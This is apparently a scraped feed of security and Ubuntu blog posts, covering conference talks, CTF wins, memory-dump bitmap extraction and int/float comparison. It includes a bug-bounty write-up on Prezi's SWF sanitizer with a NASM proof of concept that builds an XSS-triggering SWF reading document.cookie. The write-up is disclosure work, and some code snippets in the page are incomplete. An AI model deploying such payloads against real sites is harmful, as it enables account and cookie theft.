Video: Python in a hacker's toolbox (PyConPl'15)

By Gynvael Coldwind | Fri, 23 Oct 2015 00:09:32 +0200 | @domain:
PyConPl'15 logoJust a short note that the video from my talk "Python in a hacker's toolbox" (PyConPl'15) is already available on youtube. The slides can be found here.

A classical language set used by a security specialist included assembly and C, sometimes joined by C++ and usually quite a lot of Bash as well. A few years ago it seemed that Perl, and later Ruby, will become the scripting language of choice in the security field, however another contender - Python - was gaining user base too. Today it's rather obvious that Python won its place in the hacker's toolbox, especially given that a great deal of important tools of trade allow to be instrumented/scripted using it - examples include even the most basic utensils - IDA, GDB and Burp. Furthermore, Python with its set of standard libraries makes it extremely easy to create ad-hoc tools whenever they're needed. At the same time, due to rich introspection mechanisms, the language itself is an object of fascination from the security scene. The talk will focus on a few selected cases of Python intertwining with the security world.

The talk is basically a mix of Python related topics I've touched during other talks I gave (commonly with j00ru) - this includes:
■ "Data, data, data..." (English, blog post + video)
■ "On the battlefield with the dragons" (English, blog post + video)
■ "Ataki na systemy i sieci komputerowe" (Polish, slides)
■ "Pwning (sometimes) with style - Dragons' notes on CTFs" (English, slides)



44CON slides and details about further Windows kernel font vulnerabilities are out

By j00ru | Thu, 17 Sep 2015 10:17:25 +0000 | @domain:
Since my last blog post and the REcon conference in June, I have continued working on font security, especially in the area of Windows kernel and font engines derived from the Adobe Type Manager Font Driver. More specifically, I moved from manually auditing PostScript Charstring implementations to running automated fuzz-testing of the overall font-handling code; after […]

Status update. LP API, release process and Qt5 QPA shortcuts

By sil2100 | Mon, 31 Aug 2015 13:01:00 GMT | @domain:
Things are very busy as always - not having enough time to write a full-content article I decided to at least post a quick update on what I'm working on currently. Most of it is of course Ubuntu related: besides preparations for the next Ubuntu Touch update (OTA-7) and dealing with the finalization of the previous one (OTA-6), I'm also working on two Ubuntu User articles and, additionally, working my way to becoming an Ubuntu Core Developer. I'm also investigating a bug related to Qt5 QPlatformTheme keyboard shortcut handling.

Results of my recent PostScript Charstring security research unveiled

By j00ru | Tue, 23 Jun 2015 18:38:51 +0000 | @domain:
Some months ago, I started reverse engineering and investigating the security posture of the Adobe Type Manager Font Driver (ATMFD.DLL) module, which provides support for Type 1 and OpenType fonts in the Windows kernel since Windows NT 4.0, and remains there up to this day in Windows 8.1. Specifically, I focused on the handling of […]

Binary to source name. The Launchpad API

By sil2100 | Sat, 06 Jun 2015 15:22:00 GMT | @domain:
It's been a while since I wrote a programming-related post. Today I'd like to share with you a very simple, but useful, thing in the 'devel' version of the Launchpad API. When using LP or writing Python tools that need to deal with Ubuntu repositories, packages and their versions, frequently the need appears to get the source package name from its resulting binary package name as published in the selected archive (usually the main archive). It's a rather new addition, but really really useful.

Open Source Days. DWO 2015

By sil2100 | Mon, 27 Apr 2015 22:19:00 GMT | @domain:
A quick post this time. A week ago I have briefly attended an open-source conference in Bielsko-Biala, Poland. Due to a Canonical sprint overlapping, I was only able to arrive for the last day - Sunday, so I missed out on many interesting presentations. But at least I was able to meet some very interesting people and do a short talk about the Ubuntu Touch release process, quickly overviewing what tools we use and what processes we follow.

When in Wroclaw - Piwnica Quest

By Gynvael Coldwind | Fri, 27 Mar 2015 00:09:22 +0100 | @domain:
A couple of hours ago I found myself, together with a couple of friends, locked in a small vault in a basement of an old tenement house in Wrocław/Poland. Objective: escape the room in 60 minutes (+ complete a side quest). To do this we had to look for clues, solve riddles, break codes (not unlike some crypto challenges I've seen on CTFs, though much simpler) and do quite a lot of creative thinking. In the end we failed (we were so close it's painful!). But we had A LOT of fun on the way anyway :). This kind of game is called "Live Escape Room" and the one we went to, which I strongly recommend, was the room "Vault" by Piwnica Quest.

While I shouldn't write anything about the room (it would just spoil the fun for others and that's definitely an anti-objective of this post), I'll mention that our group was 5 people (which is the max. for Piwnica Quest as far as I know) and that I was really amazed by some of the riddles they created there.

And yes, the riddles are in English as well, so you don't have to know encryptedPolish.

So again, a link to their site:

And I wish you the usual HF GL!

P.S. Full-disclosure: No, this is NOT a sponsored post - there are no sponsored posts on this blog. I really had fun and that's why I'm recommending it :)
P.S.2. I've been told there are more Live Escape Rooms in Wrocław as well - seems to be a good city for fans of this kind of activity.

Insomni’hack 2015, presentation slide deck and CTF results

By j00ru | Tue, 24 Mar 2015 18:48:28 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just three days ago another edition of the great Insomni’hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by […]

Insomni'hack 2015, presentation slide deck and CTF results

By Gynvael Coldwind | Tue, 24 Mar 2015 00:09:21 +0100 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk)
Just three days ago another edition of the great Insomni'hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by Chris Valasek, or Copy & Pest – A case-study on the clipboard, blind trust and invisible cross-application XSS by Mario Heiderich. This year we were also invited to the conference to talk about CTF techniques, experiences and entertaining tasks encountered by the Dragon Sector team we lead and actively play in. We thus gave a presentation called Pwning (sometimes) with style – Dragons’ notes on CTFs, and are now making the slide deck publicly available for your enjoyment:

Pwning (sometimes) with style – Dragons’ notes on CTFs (3.86MB, PDF)

While the conference was very well organized and had many interesting talks, the main event of the evening was only about to start at 18:00: the CTF competition organized by the Insomni'hack crew, which attracted hundreds of players from all around the world, including many top teams from the CTF scene (e.g. StratumAuhuur, int3pids, dcua, penthackon, 0x8F). Since we really liked the finals from last year, Dragon Sector also came back in a large squad of 9 players; one of whom played in a different team due to a strict 8-person limit. We did our best to defend last year's title (top 1) and eventually succeeded, but it was not an easy task for sure. The most intense moment was when the StratumAuhuur team submitted a flag 4 minutes before the end of the CTF (at 3:56:23 AM), closing our point advantage to only ~20 points, which was so close that it could have easily changed in favor of Stratum regardless of our actions (due to this year's variable nature of tasks scoring, which accounted for the total number of teams solving each challenge). Fortunately, Gynvael and I were on a verge of solving another networking task at the time and barely managed to get it a little more than a minute before the end of the competition, consequently securing a win. The situation is well illustrated in the photo of the final ranking below.

The organizers, SCRT, have also published their own summary of the CTF with a full ranking and some interesting stats: Insomni’hack finals – CTF results.

How to automatically extract all raw bitmaps from a memory dump?

By Gynvael Coldwind | Fri, 27 Feb 2015 00:09:19 +0100 | @domain:
That's actually a real question with no solution (though some links) posted in this blog post. And the keyword here is "automatically" ;>

Let's starts by me making sure that the problem is stated clearly: we assume, that we have a large memory blob (anything between 500 MB to 1 TB) and we want to find all raw bitmaps and their width in it. Furthermore, since this is kinda ambiguous, by "raw bitmaps" I mean neither camera RAW formats used in digital photography (NEF, ORF, CR2 and the like) nor "image files" (like PNG, BMP, JPG, GIF, TIFF and the like) - how to find most of these things is of course common knowledge that can be summarized by "find magic or pattern that's commonly at the beginning". This approach has been used by many old school ripper programs like Multi Ripper (seen around in late '90, though I remember such apps from at least a few years earlier) or other similar though older apps, as well as newer stuff like binwalk or PhotoRec. What we're looking for is just plain bitmap data (8/24/32 bpp for starters) without any magic values, headers, compression or other strange encodings.

Where would this be useful? In analyzing various memory dumps or disk dumps where you can't make any smart calls about kernel/FS/heap/app memory structures or if parts of said are missing/have been wiped (so volatility/Slueth Kit are useless).

Usually the way I did this (and still do) was to open the file in IrfanView as .raw, set width to something around 1024, height to a large value, offset to whatever part I was analyzing and then I scrolled through the huge bitmap counting on my brain to spot any patterns. I'm not going to describe the exact details of this method, since Bernardo beat me to it and I have really nothing to add (though his GIMP method seems more friendly as you have a scroll bar to set the width which looks waaay better than putting the number manually in IrfanView). The thing I found surprising about his post is that the CTF task he gives as an example - coor coor from 9447 - is the exact task I had in mind when spawning the discussion with Ange (which later moved to twitter and made Bernardo write his post). Here are three of my findings from that task:

The discussion at twitter included several interesting links/ideas:
- @doegox pointed to his tool
- @jchillerup pointed to the cantor dust talk/tool which doesn't solve the problem, but is (i.e. looks like) probably the best non-automatic tool for this purpose; some patterns remind me of one of my previous blog posts, which spawns an idea I guess on how to find candidate bitmaps in the binary blob.
- @scanlime pointed to the autocorrelation problem, which names the problem I was thinking about and points to the solution
- @hanno pointed to JPEG compression tested on various widths/offsets, which would be another idea to find candidate bitmaps
- @sqaxomonophonen pointed to FFT and looking for spikes, which would be a way to determine the width
- @CrazyLogLad suggested something similar
- @aeliasen said this:

I'd calculate the autocorrelation of the bytes; period with strongest autocorr. should give width. You might have to throw out small periods (like 1-3) and divide by pixel depth.
Seems I need to do some reading on autocorrelation/FFT to move this forward.

If someone would like to try his luck with any of the two problems ([1] finding bitmap candidates in a LARGE binary blob and [2] automatically determining width of the candidate), the coor coor dump is here (link shamelessly taken from Bernardo's blog):

If you have any other ideas, comments or links, feel free to add them in the comment section.


Ubuntu proposed migration. update_output.txt

By sil2100 | Mon, 02 Feb 2015 11:47:00 GMT | @domain:
Those of you that know a thing or two about the Ubuntu archives also most probably know about the proposed pocket for every distribution series. In a quick overview, every upload made to the main archives first goes to -proposed and then migrates (in case of the development series) to the release pocket once the so called proposed migration is happy with it. Most of the time it just migrates fine on its own, but sometimes a package can fail to "move on". And this is where update_excuses.html and update_output.txt come in handy.

SECURE 2014 slide deck and Hex-Rays IDA Pro advisories published

By j00ru | Thu, 23 Oct 2014 12:32:55 +0000 | @domain:
Yesterday I gave a talk at a Polish security conference held in Warsaw, Poland, called “Ucieczka z Matrixa: (nie)bezpieczna analiza malware” (eng. “Escaping the Matrix: (in)secure malware analysis”). The presentation was lightly technical and concerned the different threats of using popular software to aid in interacting with and analyzing malware samples. While the talk was […]

CONFidence 2014 video from our talk on CTFs

By Gynvael Coldwind | Sat, 19 Jul 2014 00:09:01 +0200 | @domain:
Just a quick note: the video from j00ru's and my talk from this year's CONFidence edition is now online. As mentioned in the previous post on the topic, the talk was called "On the battlefield with the Dragons" and consisted of a selection of interesting CTF task solutions with some useful tips and trick near the end.

Links: video, slides.

Let us know what you think!

Slides from Ange's and my talk about Schizophrenic files, Area41

By Gynvael Coldwind | Tue, 03 Jun 2014 00:08:59 +0200 | @domain:
Yesterday I had the pleasure to co-present with Ange Albertini (@angealbertini) - if you are into binary stuff, you probably know his website - corkami, which has all sorts of cool stuff, from posters detailing binary format (e.g PE 101) to binary polyglots, etc. We talked about "schizophrenic files", i.e. various file formats which get interpreted differently depending on what program you use (e.g. a BMP image which, when viewed in one viewer, shows a cat but when using a different one shows a flying shark). Basically the story goes that we both did (separately) some more or less random digging on (or more accurately in my case: randomly stumbling on) behaviors which allow one to create a file which is open to creative interpretation by the software, or (more commonly) parser authors just decide to not follow the specs or understand them in a different way; we decided to gather all this in one place and hence the talk. We presented it at Area41 in Zurich (which btw turned out to be really well organized and awesome conference). Slides and PoCs are available below.

Slides: Schizophrenic files (Ange Albertini, Gynvael Coldwind)
PoCs: Schizophrens (PoC) ("All" contains all the files from the directories)

As usual, feedback is most welcome!


CONFidence 2014 slides from Dragon Sector are now available

By j00ru | Thu, 29 May 2014 10:07:24 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just yesterday another edition of the largest and most successful IT security conference held in Poland – CONFidence – ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for […]

CONFidence 2014 slides from Dragon Sector are now available

By Gynvael Coldwind | Thu, 29 May 2014 00:08:57 +0200 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz "j00ru" Jurczyk)

Just yesterday another edition of the largest and most successful IT security conference held in Poland - CONFidence - ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for the conference attendees and giving a talk about the most interesting challenges we have solved so far in our not too long CTF career.

The final standings of the CONFidence 2014 CTF can be found below. We will also publish a more detailed summary, together with some or all of the challenges, on our official Dragon Sector blog within a few days.

1. liub, 2. dcua, 3. 4c...fd sector

The slide deck from our presentation can be found below:
On the battlefield with the Dragons - the interesting and surprising CTF challenges (3.93MB, PDF)


A case of a curious LibTIFF 4.0.3 + zlib 1.2.8 memory disclosure

By j00ru | Wed, 30 Apr 2014 14:23:21 +0000 | @domain:
As part of my daily routine, I tend to fuzz different popular open-source projects (such as FFmpeg, Libav or FreeType2) under numerous memory safety instrumentation tools developed at Google, such as AddressSanitizer, MemorySanitizer or ThreadSanitizer. Every now and then, I encounter an interesting report and spend the afternoon diving into the internals of a specific […]

The perfect int == float comparison

By Gynvael Coldwind | Sun, 27 Apr 2014 00:08:55 +0200 | @domain:
Just to be clear, this post is not going to be about the float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some other) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using.

UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though :)

UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed.

The problem explained

Let's start by demonstrating a the problem by running the following code that compares subsequent integers with a floating point value:

float a = 100000000.0f;
printf("...99 --> %i\n", a == 99999999);
printf("...00 --> %i\n", a == 100000000);
printf("...01 --> %i\n", a == 100000001);
printf("...02 --> %i\n", a == 100000002);
printf("...03 --> %i\n", a == 100000003);
printf("...04 --> %i\n", a == 100000004);
printf("...05 --> %i\n", a == 100000005);

The result:

...99 --> 1
...00 --> 1
...01 --> 1
...02 --> 1
...03 --> 1
...04 --> 1
...05 --> 0

Sadly this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense nor standard arithmetic.

Let's look at another example - an attempt to sort a collection of numbers by value in PHP:

$x = array(

foreach ($x as $i) {
if (is_float($i)) {
printf("%.0f\n", $i);
} else {
printf("%i\n", $i);

The "sorted" result (64-bit PHP):

> php test.php

Side note: The code above must be executed using 64-bit PHP. The 32-bit PHP has integers limited to 32-bit, so the numbers I used in the example would exceed their limit and would get silently converted to doubles. This results in the following output:


So, what's going on?

It all boils down to floats having to little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value that is getting converted to float needs more than 24 bits (sic!; keep in mind that in floats there is a hardcoded "1" at the top position, which is not present in the bit-level representation) to be represented, it will get truncated - i.e. the least significant bits will be treated as zeroes.

In the C-code case above the decimal value 100000001 actually requires 27 bits to be properly represented:


However, since only the leading "1" and following 23-bits will fit inside a float, the "1" at the very end gets truncated. Therefore, this number actually becomes another number:


Which in decimal is 100000000 and therefore is equal to the float constant of 100000000.0f.

Same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated for storing the value.

A somewhat amusing side note

Actually, it gets even better. Let's re-write the first code shown above (the C one) to use a loop:

float a = 100000000.0f;
int i;
for(i = 100000000 - 5; i <= 100000000 + 5; i++) {
printf("%11.1f == %9u --> %i\n", a, i, a == i);

As you can see, there are no big changes. Now let's compile it and run it:

>gcc test.c
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 0
100000000.0 == 99999997 --> 0
100000000.0 == 99999998 --> 0
100000000.0 == 99999999 --> 0
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 0
100000000.0 == 100000002 --> 0
100000000.0 == 100000003 --> 0
100000000.0 == 100000004 --> 0
100000000.0 == 100000005 --> 0

The result is magically correct! How about we compile it with optimization then?

>gcc test.c -O3
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 1
100000000.0 == 99999997 --> 1
100000000.0 == 99999998 --> 1
100000000.0 == 99999999 --> 1
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 1
100000000.0 == 100000002 --> 1
100000000.0 == 100000003 --> 1
100000000.0 == 100000004 --> 1
100000000.0 == 100000005 --> 0

Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This however can be done in two different ways:

Option 1: The integer is converted to a floating point value, then is stored in memory as a 32-bit float and then loaded into the FPU for the comparison OR (in case of constants) the integer constant can be converted to a 32-bit float constant at compilation time and then it will be loaded into the FPU for comparison at runtime.
Option 2: The integer is directly loaded into the FPU for comparison (using fild FPU instruction or similar).

The difference here is related to the FPU internally operating on larger floating point values with more precision (by default it's 80-bits, though you can change this) - so the 32-bit integer isn't truncated on load, as it would happen if it gets converted explicitly to a 32-bit float (which, again, has only 24-bits for the actual value).

Which option is selected depends strictly on the compiler - it's mood, version, options used at compilation, etc.

The perfect comparison

Of course, it's possible to do a perfect comparison.

The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - double has large enough significand to store all possible 32-bit int values. And for the 64-bit integers you can use the 80-bit long double which has exactly 64 bits dedicated for storing the value (plus the ever-present "1").

But that's too easy. Let's try to do the actual comparison without converting to larger types.

This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below.

UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>).

The mathematical way

We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with:

1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such case this might happen and we wouldn't be able to catch it after the conversion, so we need to deal with it sooner.

2. The float value might have a non-zero fractional part. This would get truncated when converted to an int (e.g. (int)1.1f is equal to 1) - we don't want this to happen either.

The implementation of this method (with some comments) is presented below:

bool IntFloatCompare(int i, float f) {
// Simple case.
if ((float)i != f)
return false;

// Note: The constant used here CAN be represented as a float. Normally
// you would want to use INT_MAX here instead, but that value
// *cannot* be represented as a float.
const float TooBigForInt = (float)0x80000000u;

if (f >= TooBigForInt) {
return false;

if (f < -TooBigForInt) {
return false;

float ft = truncf(f);
if (ft != f) {
// Not an integer.
return false;

// It should be safe to cast float to integer now.
int fi = (int)f;
return fi == i;

The encoding-specific way

This method relies on decoding the float value from the bit-level representation, checking if it's an integer, checking if it is in range and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page.

bool IntFloatCompareBinary(int i, float f) {
uint32_t fu32;
memcpy(&fu32, &f, 4);

uint32_t sign = fu32 >> 31;
uint32_t exp = (fu32 >>23) & 0xff;
uint32_t frac = fu32 & 0x7fffff;

// NaN? Inf?
if (exp == 0xff) {
return false;

// Subnormal representation?
if (exp == 0) {
// Check if fraction is 0. If so, it's true if "i" is 0 as well.
// Otherwise it's false in all cases.
return (frac == 0 && i == 0);

int exp_decoded = (int)exp - 127;

// If exponent is negative, the number has a fraction part, which means it's not equal.
if (exp_decoded < 0) {
return false;

// If exponenta is above or equal to 31, int cannot represent so big numbers.
if (exp_decoded > 31) {
return false;

// There is one case where exp_decoded equal to 31 makes sens - when float is
// equal to INT_MIN, i.e. sign is - and fraction part is 0.
if (exp_decoded == 31 && (sign != 1 || frac != 0)) {
return false;

// What is left is in range of integer, but still can have a fraction part.

// Check if any fraction part will be left.
uint32_t value_frac = (frac << exp_decoded) & 0x7fffff;

if (value_frac != 0) {
return false;

// Check the value.
int value = (1 << 23) | frac;
int shift_diff = exp_decoded - 23;
if (shift_diff <0) {
value >>= -shift_diff;
} else {
value <<= shift_diff;

if (sign) {
value = -value;

return i == value;


The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little endian x86). With some more work both functions could be converted to be perfect "less than" comparators which then could be used to fix the PHP sorting example.

But... seriously, just cast the integer and float to something that has more precision ;>

P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot for the total of 2'147'483'647 positive integers.

Integer overflow into XSS and other fun stuff - a case study of a bug bounty

By Gynvael Coldwind | Thu, 27 Mar 2014 00:08:53 +0100 | @domain:
Some time ago I decided to spend a few evenings playing with bug bounties. I've looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise with digging into the internals of SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to get everyone into context: Prezi ( is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both online service and storage, and a desktop version which basically is just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as Prezi Bug Bounty Program goes, you can read all about it at I'll just add that everything (communication, fixing bugs, etc) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed for any parts that contain ActionScript or import other SWF files - this is done to prevent executing user's (attacker's) code. As soon as the SWF is clean, it gets loaded into the Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk based format. Each chunk starts with a header (and the data follows), that looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk: [ 0x3f ][ tag ID (10 bits) ][ data size (32 bits) ]

Both the formats of the chunks and the tag IDs are defined in "SWF File Format Specification" released by Adobe. As of today the current version is 19 updated April 23, 2013, and as to be expected, it has "only" 243 pages. There are currently 94 tag IDs defined (from 0 to 93, with a couple missing, e.g. ID 92 or ID 79-81), with some of them being just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).

As mentioned, the scrubbing basically went after the chunks which might lead to code execution - if such chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So basically embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable at that).

The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is an overkill. What you want to do is to remove the actions alone and that requires more code and digging deeper into the format, making the simple solution more complex.

On a more general note: using blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk removing code I notice the following code:

private static function skipTag(param1:ByteArray) : void
var _loc_2:* = getTagLengthAndSkipHeader(param1);
param1.position = param1.position + _loc_2;
}// end function

The red line retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a a 32-bit value, and the returned type is uint.

The yellow line does basically an addition assignment to basically skip past the chunk-that-is-OK in the data stream. The param1.position is also uint according to AS documentation.

You know where this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high level perspective (in pseudocode; I'll omit code added after patching previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
if Tag at SWF.position is in blacklist {

The skipTag was already shown above, so that leaves just the eraseTag method:

old_position ← SWF.position
temp_buffer ← new ByteArray()
SWF.position ← old_position
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.

The above allows us to basically jump backwards into a middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course leads to changing how the Adobe Flash SWF interpreter will see the file, which is different than how the sanitizer originally saw it.

Let's look at an example:

So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which described a tag which is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just second chunk's data) has a huge length which sends the sanitizer to EOF and so the sanitizer exits.
  • When the Adobe Flash SWF parsers sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tags data, and ignores is (ShowFrame has no meaningful data from SWF parsers perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed and it's not. For some reason incorrect size causes Flash to ignore any ActionScript (I never got into the bottom of why exactly is this happening though; though it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).

The final setup looked like this (in the data of the hidden junks the sanitizer was sent to EOF of course):

The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0

; SWF file

; ----------------------- HEADERS
db "FWS"
db 6 ; version 6

dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
dw (%2 | %1 <<6)

%macro TAG_LONG 2
dw (0x3f | %1 << 6)
dd .end - ($ + 4)

dw (0x3f | %1 << 6)
dd %2

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
db 0x83
dw .StringsEnd1 - ($ + 2) ; Size
db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
db '" '
; It's here. Well, send it back to the void or something.
db 0x3f ; Long tag size. (it's actually '?')
db ':' ; Tag ID. Whatever.
db ' ' ; 0x20202020 - this should be enough to get rid of it for good.
db '" + ' ; And were done here.
; Let's continue were we left, shall we?
db "document.cookie);", 0
db "", 0 ; _blank
.ActionsEnd: db 0 ; EndOfAction Flag

TAG_SHORT TAG_ShowFrame, 0

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so no sense thinking too much about it I guess; especially that it worked:

Again, I would classify this as a stored/wormable XSS.

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV key from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from * (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because AES in CBC mode works like this:
  1. Take the next 16-byte block.
  2. Decrypt the block using AES KEY and AES algorithm.
  3. XOR the result with the 16-byte IV and that's the decrypted block.
  4. GOTO 1 until end of data.
So basically:
  1. We know the result of the decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So, basically, we choose the result of the decryption of the first block* (and get trashed data in all the other blocks).
* - actually, if we think of the data as 16-byte rows, then we control one byte in each column, in a row of our choice; all bytes don't have to be in the same row.

There are a couple of important things to note:
  • The IV gives us only 16-bytes to control.
  • Doing some AES key brute forcing it might be possible to control additionally 2-5 bytes - however the time to get the additional bytes grows exponentially - it's 256**N operations (AES decryptions) basically, where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
